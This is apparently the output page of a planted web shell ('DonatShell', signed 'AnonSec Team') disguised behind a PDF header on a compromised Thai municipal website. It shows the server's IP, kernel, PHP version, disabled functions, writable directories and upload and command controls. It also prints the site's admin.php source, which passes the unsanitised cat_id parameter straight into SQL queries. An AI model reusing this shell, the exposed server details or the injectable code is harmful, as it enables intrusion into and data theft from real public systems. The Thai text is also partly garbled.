%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 122.155.177.87  /  Your IP : 122.155.177.87
Web Server : Apache/2
System : Linux cat177-87.static.lnwhostname.com 3.10.0-1160.62.1.el7.x86_64 #1 SMP Tue Apr 5 16:57:59 UTC 2022 x86_64
User : apache ( 994)
PHP Version : 5.3.29
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname,putenv,eval
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/thungkhana/domains/thungkhanan.go.th/public_html/news/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/thungkhana/domains/thungkhanan.go.th/public_html/news/admin.php
<?php
session_start();
if($_SESSION[user]==""){
session_destroy();
$message = "س Login ͹.";
$url = "../admin/index.php";
include("../admin/alert.php");
exit;
 }
require_once('../admin/Connections/conndb.php');
	//echo "empty value".$_POST['news_type'];
	mysql_select_db($database_conndb, $conndb);

	if (isset($_GET['cat_id'])) {
		$cat_id=$_GET['cat_id'];
	}	
	if($cat_id=$_GET['cat_id']){
		$query_rsNews = "SELECT * FROM news_detail  where cat_id =$cat_id ORDER BY d_date DESC, created";
	}else{
		$query_rsNews = "SELECT * FROM news_detail  ORDER BY d_date DESC, created";	
	}

	
	$rsNews = mysql_query($query_rsNews, $conndb) or die(mysql_error());
	$row_rsNews = mysql_fetch_assoc($rsNews);
	$totalRows_rsNews = mysql_num_rows($rsNews);


	$query_rsCat = "SELECT * FROM news_category  ORDER BY cat_id";
	$rsCat = mysql_query($query_rsCat, $conndb) or die(mysql_error());
	$row_rsCat = mysql_fetch_assoc($rsCat);
	$totalRows_rsCat = mysql_num_rows($rsCat);


//echo " <br> Q = ".$query_rsNews;
?>       

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><!-- InstanceBegin template="/Templates/template_a.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>                                                                                                    
<!-- InstanceBeginEditable name="doctitle" -->
<script>
function confirmDelete(delUrl) {
  if (confirm("׹ѹź")) {
    document.location = delUrl;
  }
}
</script>
 <script language="javascript">
<!--
function openWindow(theURL) { //v2.0
  var win=window.open(theURL,'staff','width=400,height=350');
  win.focus();
}
//-->
</script>
<!-- InstanceEndEditable --> 
<?php
require_once('../admin/Connections/conndb.php'); 
mysql_select_db($database_conndb, $conndb);
?>
<title>ͧúǹӺŷ觢ҹ  99/9  1 Ӻ 觢ҹ  ´ ѧѴ ѹ :: www.thungkhanan.go.th</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="../styles.css" rel="stylesheet" type="text/css">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->


<style type="text/css">
<!--
body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
	background-color: #3CFFFF;	
}
-->
</style>

<!--styles -->
<link href="../styles.css" rel="stylesheet" type="text/css" />
<link href="../css/Hover%20Buttons.css" rel="stylesheet" type="text/css"/>
<link href="../css/Hoverable-Sidenav.css" rel="stylesheet" type="text/css"/>
 <!--<script src="https://platform-api.sharethis.com/js/sharethis.js#property=5d255a83d97c100012d80679&product='inline-share-buttons' 
async='async"  type='text/javascript'> -->
   </script>
<!--styles -->


<style type="text/css">
<!--
a:link {
	text-decoration: none;
}
a:visited {
	text-decoration: none;
}
a:hover {
	text-decoration: none;
}
a:active {
	text-decoration: none;
}
.style6 {color: #FFFFFF}
-->
</style></head>

<body  background="../images/0bg1-edit1.png" style="background-repeat:no-repeat; background-position:top">




<!-- content -->
<div align="center">
  <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td align="center" valign="top"><tr>
        <td height="" align="center" valign="top"><iframe src="/head-slider.html" width="100%" height="627" scrolling="no" frameborder="0" marginheight="0" marginwidth="0"></iframe></td>
      </tr>
      <tr>
        <td align="center" valign="top">&nbsp;</td>
      </tr>
      </td>
    </tr>
    <tr>
      <td align="center" valign="top"><table width="980" border="0" align="center" cellpadding="0" cellspacing="0">
        <tr>
          <td align="center" valign="top">&nbsp;</td>
        </tr>
        <tr>
          <td align="center" valign="top">&nbsp;</td>
        </tr>
        <tr>
          <td align="center" valign="top"><!-- InstanceBeginEditable name="EditRegion3" -->
        <table width="85%" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="0">
          <tr>
            <td height="21" class="under"><div align="center" class="title2"><span class="head">
              <? 
					if ($cat_id!=""){
							$query_CatS = "SELECT * FROM news_category where cat_id =$cat_id";
							$CatS = mysql_query($query_CatS, $conndb) or die(mysql_error());
							$row_CatS = mysql_fetch_assoc($CatS);
							echo $row_CatS['cat_name']; 
					}else{
							echo "Ţ Ҥ";
					}
				?>
            </span></div></td>
            </tr>
          <tr>
            <td class="head">&nbsp;</td>
          </tr>
          <tr>
            <td class="styles1"><div align="right">
              <div align="right"><a href="../admin/main.php" class="styles2">˹ Admin </a>|
                <? 	if ($cat_id!=""){echo $row_CatS['cat_name'];}else{echo "Ǣ͢Ƿ";	} ?>
                | <a href="add_category.php" class="styles2">Ǵ </a> | <a href="add_detail.php?cat_id=<? echo $cat_id; ?>" class="styles2"></a> | <a href="../admin/signout.php" class="styles2">͡ҡк </a></div>
            </div></td>
            </tr>
          <tr>
            <td class="styles1">&nbsp;</td>
          </tr>
          <tr>
            <td colspan="3" align="left" valign="top"><div align="left">
              <table width="99%" border="0" cellspacing="0" cellpadding="0">
                <tr>
                  <td width="60%" class="styles3"><div align="left" class="styles2">ŷ <span class="title"><?php echo $totalRows_rsNews; ?></span> ¡ </div></td>
                  <td width="40%"><div align="right">
                    <table width="99%" border="0" cellspacing="1" cellpadding="1">
                      <form action="admin_search.php" method="post" enctype="multipart/form-data" name="webForm" id="webForm">
                        <tr>
                          <td width="45%"><div align="right">
                              <select name="s_cat" id="s_cat" style="width: 160px;">
                                <option value="" class="styles1"> -- ͡Ǵ-- </option>
                                <?php do { ?>
                                <option value="<? echo $row_rsCat['cat_id']; ?>" class="styles1" <? if($cat_id==$row_rsCat['cat_id']) echo "selected"?>>&nbsp;&nbsp;- <? echo $row_rsCat['cat_name']; ?></option>
                                <?php } while ($row_rsCat = mysql_fetch_assoc($rsCat));?>
                              </select>
                          </div></td>
                          <td width="45%"><div align="right">
                              <input name="s_name" type="text" class="styles1" id="s_name"  style="width: 150px;" maxlength="100" />
                          </div></td>
                          <td width="10%"><div align="left">
                              <input name="okbutton" type="image"  title=""  value=" " src="images/btn.gif" />
                          </div></td>
                        </tr>
                      </form>
                    </table>
                  </div></td>
                </tr>
              </table>
            </div></td>
          </tr>
          <tr>
            <td colspan="3" align="left" valign="top">
                <div align="center">
                  <table width="98%" border="0" cellpadding="2" cellspacing="0">
                    <?php
				  		$pagesize=100;
								$totalpage=(int)($totalRows_rsNews/$pagesize);
							   
							   if(($totalRows_rsNews% $pagesize )!= 0){
							   			$totalpage += 1;
							   }
							   if(isset($pageid)){
							   			$start=$pagesize * ($pageid - 1);
							   }
							   else{
							   			$pageid = 1;
										$start = 0 ;
							   }
							   
							   if($totalRows_rsNews!="0"){
							   		mysql_select_db($database_conndb, $conndb);
									
									//echo $query_rsNews;
									$sql=$query_rsNews."  Limit $start ,$pagesize ";
									$res = mysql_query($sql, $conndb) or die(mysql_error());
									
									if($pageid==1){
										$jk=1;
									}
									else{
										$a=$pageid * $pagesize;
										$jk=$a-$pagesize;
									}
									//echo " jk = ".$jk;
									while($c=mysql_fetch_object($res)){
				  ?>
                    <tr>
                      <td width="5%" valign="top" class="styles2"><div align="center">
                        <? 
								if($pageid==1){
									echo $jk;
								}
								else{
									$ak=$jk+1;
									echo $ak;
								}
							?>
                      </div></td>
                      <td width="85%" valign="top" class="styles1"><div align="left"><a href="detail.php?id=<? echo "$c->id";?>"  target="_blank" class="styles2"><?php echo $c->name; ?></a>  <?php if ($c->filename <> "") {?>
		<a href="doc_download/<?php echo $c->filename; ?>" target="_blank"><img src="images/download.gif" alt="ǹŴ͡" width="20" height="22" border="0" align="absmiddle" /></a><?php } ?><span class="styles2"> [ҹ <?php echo $c->click; ?> ]  <? $d=explode("-",$c->d_date);
							$dd=$d[2];
							$mm=$d[1];
							switch($mm)
								{
										case "1":
										$printmonth = "..";
										break;
										case "2":
										$printmonth = "..";
										break;
										case "3":
										$printmonth = "..";
										break;
										case "4":
										$printmonth = "..";
										break;
										case "5":
										$printmonth = "..";
										break;
										case "6":
										$printmonth = "..";
										break;
										case "7":
										$printmonth = "..";
										break;
										case "8":
										$printmonth = "..";
										break;
										case "9":
										$printmonth = "..";
										break;
										case "10":
										$printmonth = "..";
										break;
										case "11":
										$printmonth = "..";
										break;
										case "12":
										$printmonth = "..";
										break;
										}
							$yyyy=$d[0];
							$yy=$yyyy+543;
					 echo $dd." ".$printmonth." ".$yy;	 ?></span> </div></td>
                      <td width="5%" align="center"><div align="center"><a href="edit_detail.php?id=<?php echo $c->id ; ?>"><img src="images/edit.gif" alt="" width="13" height="13" border="0"></a></div></td>
                      <td width="5%" align="center"><div align="center"><a href="javascript:confirmDelete('delete_detail.php?cat_id=<?php echo $c->cat_id ; ?>&id=<?php echo $c->id ; ?>')"><img src="images/delete.gif" alt="źǢ" width="18" height="18" border="0"></a></div></td>
                    </tr>
                    <?php $jk++;		}
					  
					  }
					else  { // Show if recordset empty 
					?>
                    <tr>
                      <td height="100" colspan="4" class="title"><div align="center" class="styles">ѧբ</div></td>
                    </tr>
                    <?php } // Show if recordset empty ?>
                    </table>
              </div></td>
          </tr>
          <tr>
            <td colspan="3">&nbsp;</td>
          </tr>
          <tr>
            <td class="styles1"  colspan="3"><div align="left" class="styles2">ѧʴ˹ :
              <?            
							   
							   
							   for($i=1;$i<=$totalpage;$i++){
							   				if($i==$pageid){
													echo $i."&nbsp;";
											}
											else{
													echo "|<a href='admin.php?pageid=$i&cat_id=$cat_id' class='styles2'>$i</a>|&nbsp;";
											}
							   }
							   
							   
					  ?>
            </div></td>
          </tr>
          <tr>
            <td colspan="3">&nbsp;</td>
          </tr>
        </table>
      <!-- InstanceEndEditable --></td>
        </tr>
      </table></td>
    </tr>
    <tr>
      <td align="center" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td align="center" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td align="center" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td align="center" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td align="center" valign="top" style="background-repeat:no-repeat"><img src="../images/foot.png"></td>
    </tr>
  </table>
</div>
<!-- end_content -->

<tr><td><a style="display:scroll;position:fixed;bottom:5px;right:5px;" class="backtotop" href="#top" rel="nofollow" title="Back to Top"><img src="../images/up.png" border="0" /></a></td>
</tr>








<map name="Map6" id="Map6"><area shape="rect" coords="210,1,302,41" href="http://www.tratlocal.go.th/index.php" target="_blank" />
</map>
</body>
<!-- InstanceEnd --></html>
<?php
mysql_free_result($rsNews);

	 if($conndb)
	 {
	  mysql_close($conndb);
	  unset($conndb);
	 }
?>

Anon7 - 2022
AnonSec Team